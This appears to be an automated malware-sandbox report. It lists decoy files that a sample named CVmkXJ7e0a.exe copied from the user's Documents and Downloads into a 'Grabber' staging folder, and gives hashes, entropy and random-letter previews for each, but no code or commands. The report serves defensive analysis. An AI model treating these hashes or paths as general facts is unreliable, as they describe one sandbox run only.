SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\SUAVTZKNFL\BJZFPPWAPT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\SUAVTZKNFL\BNAGMGSPLO.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\SUAVTZKNFL\EEGWXUHVUG.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\SUAVTZKNFL\EFOYFBOLXA.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Documents\SUAVTZKNFL\SUAVTZKNFL.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\BJZFPPWAPT.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\BNAGMGSPLO.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\BNAGMGSPLO.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\BNAGMGSPLO.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701704028955216
Encrypted:	false
SSDEEP:	24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
MD5:	5F97B24D9F05FA0379F5E540DA8A05B0
SHA1:	D4E1A893EFD370529484B46EE2F40595842C849E
SHA-256:	58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
SHA-512:	A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
Malicious:	false
Preview:	BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Downloads\DUUDTUBZFW.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
